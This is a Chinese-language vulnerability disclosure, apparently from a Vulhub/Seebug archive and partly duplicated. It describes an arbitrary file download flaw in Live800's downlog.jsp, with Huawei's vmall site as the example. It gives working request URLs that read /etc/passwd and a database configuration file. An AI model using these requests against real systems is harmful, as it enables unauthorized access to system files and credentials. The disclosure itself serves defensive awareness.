VULHUB ™

### 简要描述： 偷闲发个漏洞，许多大厂商在，用危害挺大的。 ### 详细说明： 在live800客服站点上fuzz出一个downlog.jsp文件 这里以 华为 为例： ``` http://robotim.vmall.com/live800/downlog.jsp ``` [<img src="https://images.seebug.org/upload/201510/17011441b30d37acd06be31ff2f078c1077d148b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/17011441b30d37acd06be31ff2f078c1077d148b.png) 根据提示猜测有可能是downlog.jsp没有接收到下载路径，于是继续fuzz参数： ``` downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd …… ``` 最终fuzz到downlog.jsp?filepath=/&fileName=/etc/passwd成功下载文件。 ``` http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd ``` [<img src="https://images.seebug.org/upload/201510/170121542936117806674ceff9c9231e8269cd9a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/170121542936117806674ceff9c9231e8269cd9a.png) 通过此漏洞下载dataSource.xml文件： ```...

### 简要描述： 偷闲发个漏洞，许多大厂商在，用危害挺大的。 ### 详细说明： 在live800客服站点上fuzz出一个downlog.jsp文件 这里以 华为 为例： ``` http://robotim.vmall.com/live800/downlog.jsp ``` [<img src="https://images.seebug.org/upload/201510/17011441b30d37acd06be31ff2f078c1077d148b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/17011441b30d37acd06be31ff2f078c1077d148b.png) 根据提示猜测有可能是downlog.jsp没有接收到下载路径，于是继续fuzz参数： ``` downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd …… ``` 最终fuzz到downlog.jsp?filepath=/&fileName=/etc/passwd成功下载文件。 ``` http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd ``` [<img src="https://images.seebug.org/upload/201510/170121542936117806674ceff9c9231e8269cd9a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/170121542936117806674ceff9c9231e8269cd9a.png) 通过此漏洞下载dataSource.xml文件： ``` http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/home/---xxxx-xx-/live800/WEB-INF/conf/dataSource.xml ``` [<img src="https://images.seebug.org/upload/201510/170127372641f110ccb8a21a0872adaf539a35bb.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/170127372641f110ccb8a21a0872adaf539a35bb.png) 通过此文件能够下载服务器任意文件。 最终得到的downlog.jsp源码如下： [<img src="https://images.seebug.org/upload/201510/1701325308de1c9d2469097bf81270827686884c.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1701325308de1c9d2469097bf81270827686884c.png) ### 漏洞证明： 同上 管理补充有效案例：